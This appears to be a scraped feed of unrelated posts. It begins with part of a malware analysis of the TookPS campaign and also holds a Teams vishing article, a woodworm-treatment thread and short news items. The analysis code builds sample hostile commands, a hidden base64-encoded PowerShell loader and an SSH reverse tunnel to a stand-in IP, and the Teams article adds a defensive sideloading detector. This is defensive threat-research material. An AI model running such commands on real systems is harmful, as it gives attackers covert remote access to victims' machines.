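_MIDDLE = ('$TookEnc="%s"; iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($TookEnc)))'
           % base64.b64encode(_INNER.encode()).decode())
SAMPLE_ENCODED = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_MIDDLE.encode("utf-16-le")).decode()
SAMPLE_TUNNEL = ('ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@198.51.100.7 '
                 '-i "C:\\Users\\victim\\.ssh\\Rc7DexAU73l.41431" -f "C:\\Users\\victim\\.ssh\\config"')

if __name__ == "__main__":
    for sample in (SAMPLE_ENCODED, SAMPLE_TUNNEL):
        print(analyze(sample))
```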

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in a variety of ways.

Infrastructure


The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways


The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs




securelist.com/tookps/116019/



Israeli settlers disappointed by the rubble of Jenin: «It's not enough for us, we want this city to be like Gaza»


@Notizie dall'Italia e dal mondo
The newspaper Yisrael HaYom reports on a tour organised by the military command to show the results of Operation "Iron Wall". The settlers are calling for the military offensive to be stepped up further



Automation has not freed us from work, or from exploitation


@Informatica (Italy e non Italy 😁)
Who will work, and how, in an era in which the myth of artificial intelligence is taking the place of the myth of automation? We discussed this with someone who has studied automation from the post-war period to the present day, professor of contemporary history Jason Resnikoff.
The article L’automazione



Help with woodworm treatment


To the whole Fediverse, I repeat, the whole Fediverse.

Alarm, I repeat, alarm.

Mayday, Mayday!

For several nights I've been hearing something gnawing at the wardrobe in my bedroom; I fear it's woodworm.

I need to do a woodworm treatment but I've never done one, and on top of that I'm a modern man, the kind who can't do anything (unlike the men of old, who could do everything).

Does any of you have experience with this kind of treatment?

Don't give me links to pages about it, I can find those myself; I'm looking for people who have actually done it.

Enough Trump, enough Vance, enough Musk: from today I want you all focused on my wardrobe.

Over.

in reply to Massimiliano Polito 🇪🇺🇮🇹

@max there are special poisons for this; you can find them both at agricultural cooperatives and in DIY shops. With great patience and a good syringe, you have to inspect the wood and inject the poison into every little hole you find. Then you insert a toothpick into the hole, which serves two purposes: 1 it reminds you that that hole has already been treated.
2 if the woodworm was there, it stays walled in until it dies.
When you have finished treating the whole piece of furniture you will have a brand-new Saint Sebastian..
At that point, with a razor blade or a cutter, you cut off all the toothpicks so as to plug the hole flush; depending on the colour of the furniture you apply something to mask the toothpicks and then give it a finishing product.
Good luck
in reply to Maurizio

@maurizio

Thank you very much.

Unfortunately I can't see any holes... I'll go over it again with a magnifying glass, but is it possible that they are so small as to be invisible?

I've checked the inside and the top; the outer walls not yet thoroughly, but they are treated, and I figured that if I were a woodworm I'd have preferred to get in from the top, where the wood is rougher and untreated.

To be honest there are holes inside, but they are purpose-made holes, 5 mm in diameter; there used to be screws holding something, then the "something" was removed and the holes stayed. Are those holes also at risk?



EDRi-gram, 2 April 2025


What has the EDRis network been up to over the past two weeks? Find out the latest digital rights news in our bi-weekly newsletter. In this edition: DSA complaint X, New civic coalition for journalists and civil society, imagining EU-topia, & more!

The post EDRi-gram, 2 April 2025 appeared first on European Digital Rights (EDRi).




Mariani's return to Mbda and the future challenges of European missile systems

@Notizie dall'Italia e dal mondo

Lorenzo Mariani has (once again) taken on the role of Executive group director sales & business development, as well as managing director, of Mbda Italia, succeeding Giovanni Soccodato. Mariani thus returns to Mbda Italia after a period at Leonardo, where he held the



Shipbuilding: nuclear power has the potential to revolutionise the sector. Here's how

@Notizie dall'Italia e dal mondo

Nuclear power could represent a turning point, not only for national energy autonomy but also for the shipbuilding sector. The debate over a possible return of nuclear power in Italy is opening up various prospects for the use of new technologies



Today, on World Autism Awareness Day, the Palazzo dell'Istruzione was lit up in blue.

Minister Giuseppe Valditara invited schools to organise moments of sharing and reflection.




Cyber security: the key is the partnership between humans and artificial intelligence


@Informatica (Italy e non Italy 😁)
Protection and defence capabilities in cyber security can be improved through a mix of enriched collaboration and increased effectiveness, using an "operational hybrid" made up of the individual and AI agents.



Cyber attack via Teams: a simple message can compromise your company!


With the growing use of collaboration tools such as Microsoft Teams, companies need to be aware of the risks of possible cyber attacks. Implementing advanced security measures and properly training users becomes essential to counter the threats. In response to this problem, Microsoft has announced the introduction of security notifications in Quick Assist, designed to warn users of possible tech-support scam attempts. Organisations are also advised to restrict or disable the use of Quick Assist and other remote access tools where they are not strictly necessary, to reduce the risk of compromise.

A sophisticated attack using vishing and legitimate tools


A recent report from Ontinue's Cyber Defence Centre documented an attack in which the attackers used a combination of social engineering, vishing (voice phishing) and remote access software to infiltrate corporate systems.

The attack technique involved sending a Microsoft Teams message containing a malicious PowerShell command. Exploiting users' trust in internal communications, the cybercriminal posed as an IT technician to persuade the victim to run the command and grant remote access via Quick Assist. This tactic is consistent with the techniques used by the Storm-1811 group, known for using vishing and remote support tools to take control of target devices.

The payload and the backdoor installation


After gaining initial access, the attackers used DLL sideloading to run malicious code through a legitimate, signed TeamViewer.exe binary, which loaded a malicious module, TV.dll.

This approach allows security systems to be evaded, since the executable looks genuine. The second stage of the attack involved running a JavaScript-based backdoor via Node.js (hcmd.exe), which established a persistent connection to the attackers' command-and-control servers.

Thanks to its socket functionality, the attackers could run commands remotely without being easily detected.
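The same TeamViewer sideloading pattern appears in both the TookPS write-up above (the TeviRat sample) and this section (TV.dll), so one added detection example serves both; it is not code from either report. It runs two heuristics over constructed image-load telemetry: a signed host process loading a DLL from its own directory that is unsigned or signed by someone else, and a process whose on-disk name differs from the PE OriginalFilename of a known script runtime (the renamed Node.js case). The record fields, paths and signer strings are assumptions constructed for the demo, not any vendor's schema.

```python
import ntpath
from dataclasses import dataclass

# Runtimes that implants are commonly copied and renamed from; the Node.js entry
# covers the hcmd.exe case. This set is an assumption for the demo, not an exhaustive list.
RENAMED_RUNTIMES = {"node.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class ImageLoad:
    """One constructed image-load record (field names are assumptions, not a vendor schema)."""
    process_path: str
    process_original_name: str  # OriginalFilename from the process's PE version resource
    process_signer: str         # "" when unsigned
    image_path: str
    image_signer: str           # "" when unsigned


def classify(ev: ImageLoad) -> list:
    """Return the names of the heuristics that fire for one image-load event."""
    findings = []
    proc_dir = ntpath.dirname(ev.process_path).lower()
    img_dir = ntpath.dirname(ev.image_path).lower()
    # Sideload heuristic: signed host process loads a DLL from its own directory whose
    # signer does not match (TV.dll dropped next to a genuine TeamViewer.exe).
    if ev.process_signer and proc_dir == img_dir and ev.image_signer != ev.process_signer:
        findings.append("dll-sideload-candidate")
    # Renamed runtime heuristic: the file on disk does not carry the name the PE claims.
    on_disk = ntpath.basename(ev.process_path).lower()
    original = ev.process_original_name.lower()
    if original in RENAMED_RUNTIMES and on_disk != original:
        findings.append("renamed-script-runtime")
    return findings


def scan(events) -> dict:
    """Map each process path to its findings, keeping only the events that fired."""
    report = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            report[ev.process_path] = hits
    return report


# Constructed telemetry (not from either report): one sideload, one benign load, one renamed node.exe.
EVENTS = [
    ImageLoad(r"C:\Users\victim\AppData\Local\Temp\tv\TeamViewer.exe", "TeamViewer.exe",
              "TeamViewer Germany GmbH", r"C:\Users\victim\AppData\Local\Temp\tv\TV.dll", ""),
    ImageLoad(r"C:\Program Files\TeamViewer\TeamViewer.exe", "TeamViewer.exe",
              "TeamViewer Germany GmbH", r"C:\Program Files\TeamViewer\TV.dll", "TeamViewer Germany GmbH"),
    ImageLoad(r"C:\Users\victim\AppData\Roaming\hcmd.exe", "node.exe",
              "OpenJS Foundation", r"C:\Windows\System32\ws2_32.dll", "Microsoft Windows"),
]

if __name__ == "__main__":
    for path, hits in scan(EVENTS).items():
        print(path, "->", ", ".join(hits))
```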

Detection and prevention strategies


The observed attack chain falls under several categories of the MITRE ATT&CK framework, including:

  • T1105 – Transfer of malicious tools
  • T1656 – Impersonation
  • T1219 – Use of remote access software
  • T1218 – Execution via signed binaries
  • T1197 – Abuse of BITS jobs

To mitigate the risk of similar attacks, security experts advise companies to restrict the use of non-essential remote access tools and to disable external connections to Teams. In addition, training employees on social engineering and voice phishing techniques is essential to reduce the likelihood of falling victim to these sophisticated malicious campaigns.

The article Cyber attack via Teams: a simple message can compromise your company! originally appeared on il blog della sicurezza informatica.



Ukraine: cleaning up the public debate on the conflict


Valigia Blu highlights the omissions, inconsistencies and some distortions in Kuperman's article.
Happy reading


A Toothbrush Hacked, in Three Parts


It’s official, we’re living in the future. Certainly that’s the only explanation for how [wrongbaud] was able to write a three-part series of posts on hacking a cheap electric toothbrush off of AliExpress.

As you might have guessed, this isn’t exactly a hack out of necessity. With a flair for explaining hardware hacking, [wrongbaud] has put this together as a practical “brush-up” (get it?) on the tools and concepts involved in reverse engineering. In this case, the Raspberry Pi is used as a sort of hardware hacking multi-tool, which should make it relatively easy to follow along.
Modified image data on the SPI flash chip.
The first post in the series goes over getting the Pi up and running, which includes setting up OpenOCD. From there, [wrongbaud] actually cracks the toothbrush open and starts identifying interesting components, which pretty quickly leads to the discovery of a debug serial port. The next step is harassing the SPI flash chip on the board to extract its contents. As the toothbrush has a high-res color display (of course it does), it turns out this chip holds the images which indicate the various modes of operation. He’s eventually able to determine how the images are stored, inject new graphics data, and write it back to the chip.

Being able to display the Wrencher logo on our toothbrush would already be a win in our book, but [wrongbaud] isn’t done yet. In the last post of the series, he shows how to extract the actual firmware from the microcontroller using OpenOCD. This includes how to analyze the image, modify it, and eventually flash the new version back to the hardware — using that debug port discovered earlier to confirm the patched code is running as expected.

If you like his work with a toothbrush, you’ll love seeing what [wrongbaud] can do with an SSD or even an Xbox controller.


hackaday.com/2025/04/02/a-toot…